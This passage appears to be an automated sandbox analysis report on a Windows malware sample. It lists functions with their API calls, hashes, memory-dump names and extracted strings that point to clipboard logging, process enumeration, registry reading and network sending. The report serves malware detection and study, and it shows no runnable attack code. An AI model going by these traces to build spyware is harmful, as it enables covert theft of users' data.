                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                              • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,0C[), ref: 0041C08B
                                                • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,0C[), ref: 0041C096
                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 2180151492-0
                                              • Opcode ID: 204b5ef21a7d4ea8aa917a611218bdac846caf120eef70baedcc9305cadbfcc5
                                              • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                              • Opcode Fuzzy Hash: 204b5ef21a7d4ea8aa917a611218bdac846caf120eef70baedcc9305cadbfcc5
                                              • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                              Function 00412716 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 93sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                              • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQuerySleepValue
                                              • String ID: 0C[$8)[$exepath$xdF
                                              • API String ID: 4119054056-2536218977
                                              • Opcode ID: abb323afdf3d65a8fcb9fe28f99c1048d11d133e5e733d2859862f82a45f57bd
                                              • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                                              • Opcode Fuzzy Hash: abb323afdf3d65a8fcb9fe28f99c1048d11d133e5e733d2859862f82a45f57bd
                                              • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                                              Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                              • _free.LIBCMT ref: 0044F43F
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: 5500135b4103b87c343acc58efff57d349ffb1ffd5e47bf571a7f4768ca97117
                                              • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                              • Opcode Fuzzy Hash: 5500135b4103b87c343acc58efff57d349ffb1ffd5e47bf571a7f4768ca97117
                                              • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                              Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                              • _free.LIBCMT ref: 00448353
                                              • _free.LIBCMT ref: 0044837A
                                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                              • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                              • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                              • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                              Function 0041C26E Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseHandleOpen$FileImageName
                                              • String ID:
                                              • API String ID: 2951400881-0
                                              • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                              • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                              • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                              • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                              Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00450A54
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 00450A66
                                              • _free.LIBCMT ref: 00450A78
                                              • _free.LIBCMT ref: 00450A8A
                                              • _free.LIBCMT ref: 00450A9C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                              • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                              • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                              • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                              Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00444106
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 00444118
                                              • _free.LIBCMT ref: 0044412B
                                              • _free.LIBCMT ref: 0044413C
                                              • _free.LIBCMT ref: 0044414D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                              • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                              • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                              • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                              Function 0044BAB7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: v%(/
                                              • API String ID: 0-2435473048
                                              • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                              • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                              • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                              • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                              Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFileKeyboardLayoutNameconnectsend
                                              • String ID: XQG$NG$PG
                                              • API String ID: 1634807452-3565412412
                                              • Opcode ID: b482f1db867d8d4eeecc1dc4e5804c467bd35124d5afc023a4359c15b2746b62
                                              • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                              • Opcode Fuzzy Hash: b482f1db867d8d4eeecc1dc4e5804c467bd35124d5afc023a4359c15b2746b62
                                              • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                              Function 00452EF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00453009
                                                • Part of subcall function 00452DF9: __alloca_probe_16.LIBCMT ref: 00452E62
                                                • Part of subcall function 00452DF9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452EBF
                                                • Part of subcall function 00452DF9: __freea.LIBCMT ref: 00452EC8
                                              • _free.LIBCMT ref: 00452F5F
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00452F9A
                                                • Part of subcall function 00445B74: HeapAlloc.KERNEL32(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHeapLast_free$AllocByteCharFreeMultiWide__alloca_probe_16__freea
                                              • String ID: v%(/
                                              • API String ID: 1317440246-2435473048
                                              • Opcode ID: 6f7d6b8a41de1fbed53486ea7b03a8913d460fbbb43c153e705b8e5521843823
                                              • Instruction ID: b42996e4f32b2ce3557a5317cf724a2d3ce4ed36614ed27229f3ff0ed108fdae
                                              • Opcode Fuzzy Hash: 6f7d6b8a41de1fbed53486ea7b03a8913d460fbbb43c153e705b8e5521843823
                                              • Instruction Fuzzy Hash: 9441D571800225ABDF319F258C41FAB7BB8EF05756F00419BFD08E6296EA36CE44DB65
                                              Function 0044B89F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,?,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0044BBFE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?), ref: 0044B980
                                              • GetLastError.KERNEL32(?,0044BBFE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B9B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                              • String ID: v%(/
                                              • API String ID: 2456169464-2435473048
                                              • Opcode ID: 61a1eb95f210c0310294f4f1a604aaa858dc35aa92d75ae144fe4a4ae54a0673
                                              • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                              • Opcode Fuzzy Hash: 61a1eb95f210c0310294f4f1a604aaa858dc35aa92d75ae144fe4a4ae54a0673
                                              • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                              Function 00452DF9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              • __alloca_probe_16.LIBCMT ref: 00452E62
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452EBF
                                              • __freea.LIBCMT ref: 00452EC8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide__alloca_probe_16__freea
                                              • String ID: v%(/
                                              • API String ID: 3062693170-2435473048
                                              • Opcode ID: ff00a4c2f1050e14954907e5769f36e1cdeb28ccf5f2e28fac67180d14375554
                                              • Instruction ID: 547a5762545d9e1961a78ac081f297de34cc2a53ea43b9f31110d22f3e4d4f85
                                              • Opcode Fuzzy Hash: ff00a4c2f1050e14954907e5769f36e1cdeb28ccf5f2e28fac67180d14375554
                                              • Instruction Fuzzy Hash: 81312532A00156ABDB249FA5CD42CAF7BA4EB45715F08466AFC14EB282DB38CC44C794
                                              Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                              • String ID: /sort "Visit Time" /stext "$0NG
                                              • API String ID: 368326130-3219657780
                                              • Opcode ID: 19a75f4089cd682c196d93085774e8610958794b4b53e2c59ee42357a682b9a9
                                              • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                              • Opcode Fuzzy Hash: 19a75f4089cd682c196d93085774e8610958794b4b53e2c59ee42357a682b9a9
                                              • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                              Function 0040B783 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                              • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Init_thread_footer__onexit
                                              • String ID: [End of clipboard]$[Text copied to clipboard]$xdF
                                              • API String ID: 1881088180-1310280921
                                              • Opcode ID: 817b4c01eafabb62cefe08f25f435df96e29b2123a05dda1d2c5d8970e98f987
                                              • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
